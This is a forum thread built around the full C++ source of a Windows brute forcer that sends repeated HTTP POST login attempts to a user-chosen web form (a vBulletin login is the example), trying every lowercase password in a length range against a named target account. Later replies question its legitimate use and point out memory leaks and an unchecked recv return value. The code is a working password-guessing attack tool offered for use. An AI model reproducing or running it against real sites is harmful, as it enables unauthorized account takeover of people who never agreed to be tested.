Results 1 to 9 of 9

Thread: Brute Forcer Example Source Code

  1. #1
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default Brute Forcer Example Source Code

    I have coded this sometime ago for windows, I'll be making a nice brute forcer of this for BT soon. ( Probally tommorow )

    Code:
    /*
    **
    ** Brute Forcer Example Source Code
    ** UnnamedOne
    ** brian_denys@hotmail.com
    ** hxxp://xxx.remote-exploit.org
    **
    */
    
    #include <winsock2.h>
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>
    #include <signal.h>
    #include <stdarg.h>
    #include <iostream.h>
    #pragma comment(lib, "ws2_32.lib")
    
    #define ijji "Avatar"
    #define SkyGamers ""
    
    SOCKET Conn;
    char URL[256];
    char Path[256];
    char UserVar[256];
    char PassVar[256];
    char Username[32];
    char def_charset[] = "abcdefghijklmnopqrstuvwxyz";
    unsigned int inc[128];
    
    // Prototypes
    // Connect, send, etc..
    int Connect(char* szIP, int szPort);
    int guess(char* szUser, char* szPass);
    int remotePOST(SOCKET m_sConnection, CHAR* m_cHost, CHAR* m_cPath, CHAR* m_cData, CHAR* m_cReferer, CHAR* m_cCookies);
    int End(SOCKET s);
    // Brute Force Algoritm Functions
    int finished(char *block, char *charset, char *templ);
    void increment(char *block, int len, char *charset, char *templ);
    void chunk(int start, int end, char *charset, char *templ, char *startblock);
    int StartBrute(int min, int max);
    
    int main()
    {
    	int min, max;
    	cout << "Enter URL of target witout hxxp:// (Ex. xxx.targethost.com)" << endl;
    	cin >> URL;
    	cout << "Enter Path (Ex. /index.php)" << endl;
    	cin >> Path;
    	cout << "Username variable (Ex. vBulletin_username)" << endl;
    	cin >> UserVar;
    	cout << "Password variable (Ex. vBulletin_password)" << endl;
    	cin >> PassVar;
    	cout << "Target Username (Ex. Asshole)" << endl;
    	cin >> Username;
    	cout << "Minimum characters?" << endl;
    	cin >> min;
    	cout << "Maximum characters?" << endl;
    	cin >> max;
    	StartBrute(min,max);
    	return 0;
    }
    
    int Connect(char* szIP, int szPort)
    {
    	WSADATA wsaData;
    	int iResult;
    	SOCKET ConnectSocket;
    	sockaddr_in clientService;
    	struct hostent* m_hHost;
    
    	iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    	if(iResult != NO_ERROR)
    		printf("Error at WSAStartup()\n");
    
    	ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    	if(ConnectSocket == INVALID_SOCKET)
    	{
    		printf("Error at socket(): %ld\n", WSAGetLastError());
    		WSACleanup();
    		return 1;
    	}
    
    	m_hHost = gethostbyname(szIP);
    
    	memset( &clientService, 0, sizeof clientService );
    
    	clientService.sin_family = AF_INET;
    	clientService.sin_addr = *(struct in_addr *)m_hHost->h_addr;
    	clientService.sin_port = htons(szPort);
    
    	if(connect(ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService)) == SOCKET_ERROR)
    	{
    		printf( "Failed to connect.\n" );
    		WSACleanup();
    		return 1;
    	}
    	else
    	{
    		//printf("Connected to %s:%d\n", m_hHost->h_name, szPort);
    	}
    
    	Conn = ConnectSocket;
    
    	return ConnectSocket;
    }
    
    int guess(char* szUser, char* szPass)
    {
    	int iResult;
    	int recvbuflen = 800096;
    	char* recvbuf = (char*)malloc(800096);
    
    	char* hxxpURL = (char*)malloc(256);
    	sprintf(hxxpURL, "hxxp://%s",URL);
    
    	char* vars = (char*)malloc(256);
    	sprintf(vars, "%s=%s&%s=%s",UserVar, szUser, PassVar, szPass);
    
    	remotePOST(Conn, URL, Path, vars, hxxpURL, NULL);
    
    	iResult = recv(Conn, recvbuf, recvbuflen, 0);
    	recvbuf[iResult] = 0x00;
    	printf("%s",recvbuf);
    	char* strip = strstr(recvbuf, (const char*)"changed");
    	//printf("%s\n",strip);
    	if(strip != NULL){
    		MessageBox(NULL,szPass,"Found!",MB_OK);
    		ExitProcess(0);
    	}
    
    	memset(recvbuf,0,sizeof(recvbuf));
    
    	return 0;
    }
    
    int remotePOST(SOCKET m_sConnection, CHAR* m_cHost, CHAR* m_cPath, CHAR* m_cData, CHAR* m_cReferer, CHAR* m_cCookies)
    {
    	CHAR* m_cCompleteBuffer = (CHAR*)malloc(2096);
    
    	if(m_cCookies)
    	{
    		sprintf(m_cCompleteBuffer,
    			"POST %s "
    			"HXXP/1.1\r\n"
    			"Host: %s\r\n"
    			"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n"
    			"Referer: %s\r\n"
    			"Keep-Alive: 300\r\n"
    			"Connection: keep-alive\r\n"
    			"Cookie: %s\r\n"
    			,m_cPath
    			,m_cHost
    			,m_cReferer
    			,m_cCookies);
    	}
    	else
    	{
    		sprintf(m_cCompleteBuffer,
    			"POST %s "
    			"HXXP/1.1\r\n"
    			"Host: %s\r\n"
    			"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n"
    			"Referer: %s\r\n"
    			"Keep-Alive: 300\r\n"
    			"Connection: keep-alive\r\n"
    			,m_cPath
    			,m_cHost
    			,m_cReferer);
    	}
    
    	CHAR* m_cDummy  = "Content-Type: application/x-www-form-urlencoded\r\n";
    	CHAR* m_cDummy2 = (CHAR*)malloc(128);
    
    	INT m_iLength = strlen(m_cData);
    
    	sprintf(m_cDummy2,"Content-Length: %i\r\n\r\n",m_iLength);
    
    	INT m_iReturn = send(m_sConnection,m_cCompleteBuffer,strlen(m_cCompleteBuffer),0);
    	
    	if(m_iReturn)
    	{
    		m_iReturn = send(m_sConnection,m_cDummy,strlen(m_cDummy),0);
    		
    		if(m_iReturn)
    		{
    			m_iReturn = send(m_sConnection,m_cDummy2,strlen(m_cDummy2),0);
    				
    				if(m_iReturn)
    				{
    					m_iReturn = send(m_sConnection,m_cData,strlen(m_cData),0);
    
    					if(m_iReturn)
    					{
    						free(m_cDummy2);
    						free(m_cCompleteBuffer);
    						return m_iReturn;
    					}
    				}
    		}
    	}
    
    	free(m_cDummy2);
    	free(m_cCompleteBuffer);
    
    	return m_iReturn;
    }
    
    int End(SOCKET s)
    {
    	shutdown(s, SD_SEND);
    	closesocket(s);
    	WSACleanup();
    
    	return 1;
    }
    
    // Brute Force Algoritm Functions
    // hxxp://darkc0de.com/c0de/c/crunch.txt
    int finished(char *block, char *charset, char *templ)
    {
    	unsigned int i;
    
    	if(templ[0]==0)
    	{
    		for(i=0;i<strlen(block);i++)
    			if(inc[i] < strlen(charset)-1)	return FALSE;
    	}
    	else
    	{
    		for(i=0;i<strlen(block);i++)
    			if(templ[i]=='@' && (inc[i] < strlen(charset)-1)) return FALSE;
    	}
    
    	return TRUE;
    }
    
    void increment(char *block, int len, char *charset, char *templ)
    {
    	int i;
    
    	for(i=strlen(block)-1;i>-1;i--)
    	{
    		if(templ[0]==0 || templ[i]=='@')
    		{
    			if(inc[i] < strlen(charset)-1)
    			{
    				inc[i]++;
    				block[i] = charset[inc[i]];
    				i=-1;
    			}
    			else
    			{
    				block[i] = charset[0];
    				inc[i] = 0;
    			}
    		}
    		else
    		{
    		}
    	}
    }
    
    void chunk(int start, int end, char *charset, char *templ, char *startblock)
    {
    	int i,j,k,t;
    	char block[128];
    
    	if(end-start <0) return;
    
    	if(templ[0]==0) t=0;
    	else		t=1;
    
    	for(i=start;i<=end;i++)
    	{
    		memset(block,0,sizeof(block));
    
    		for(j=0;j<i;j++)
    		{
    			if(startblock[0]==0)
    			{
    				if(t==0)
    				{
    					block[j] = charset[0];
    					inc[j] = 0;
    				}
    				else
    				{
    					if(templ[j]=='@')
    					{
    						block[j] = charset[0];
    						inc[j] = 0;
    					}
    					else			block[j] = templ[j];
    				}
    			}
    			else
    			{
    				block[j] = startblock[j];
    
    				for(k=0;k<strlen(charset);k++)
    					if(block[j]==charset[k]) inc[j] = k;
    			}
    		}
    
    		printf("Trying: %s\n",block);
    		Connect(URL, 80);
    		guess(Username, block);
    		End(Conn);
    		while(!finished(block,charset,templ))
    		{
    			increment(block,i,charset,templ);
    			printf("Trying: %s\n",block);
    			Connect(URL, 80);
    			guess(Username, block);
    			End(Conn);
    		}
    	}
    }
    
    int StartBrute(int min, int max)
    {
    	char charset[256];
    	char templ[256];
    	char startblock[256];
    
    	memset(charset,0,sizeof(charset));
    	memset(templ,0,sizeof(templ));
    	memset(startblock,0,sizeof(startblock));
    
    	strncpy(charset,def_charset,strlen(def_charset));
    
    	chunk(min,max,charset,templ,startblock);
    
    	return 1;
    }

  2. #2
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    I'm curious as to what legitimate purposes this code could be used for.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  3. #3
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    Well if it's not allowed remove ^.^

    But I think it is.. Since there's brute forcers included in BT

  4. #4
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by UnnamedOne View Post
    Well if it's not allowed remove ^.^

    But I think it is.. Since there's brute forcers included in BT
    I didn't say it wasn't allowed, I am simply curious as to what legitimate uses this code has.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  5. #5
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    It apprears to be HTTP only. Does this offer something that other brute force programs don't have?
    Thorn
    Stop the TSA now! Boycott the airlines.

  6. #6
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    Quote Originally Posted by Thorn View Post
    It apprears to be HTTP only. Does this offer something that other brute force programs don't have?
    Nope, I just code things like this as a challenge for myself.

  7. #7
    Junior Member
    Join Date
    May 2007
    Posts
    82

    Default

    UnnamedOne!!! Jus checked out your code. I dont really know c++ tht much but i know C and from what i can see. It's pretty good even if other brute forces do HTTP attacks! It's a start!!!! Keep it up ^_^. Programming jus for the challenge :-D like me :-D

  8. #8
    Just burned his ISO
    Join Date
    Jun 2007
    Posts
    15

    Default possible memory leak?

    hello,
    i haven't tried to compile e run your program, but i have only read your code, so my opinion could be totally wrong.
    i think your program expose multiple memory leak, example the function "int guess(char* szUser, char* szPass)" allocate three buffer "char* recvbuf = (char*)malloc(800096);", "char* hxxpURL = (char*)malloc(256);" and "char* vars = (char*)malloc(256);" but never free up they.
    also i see you use the return value of function "recv" like index in the recvbuf "iResult = recv(Conn, recvbuf, recvbuflen, 0); recvbuf[iResult] = 0x00;", its is dangerous, "recv" could return -1!!!!
    sorry if i bother you, i hope my post is usefull.

  9. #9
    Just burned his ISO masliko's Avatar
    Join Date
    Mar 2008
    Posts
    7

    Default

    What language is this written in?(sorry i don't know any programming at all)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •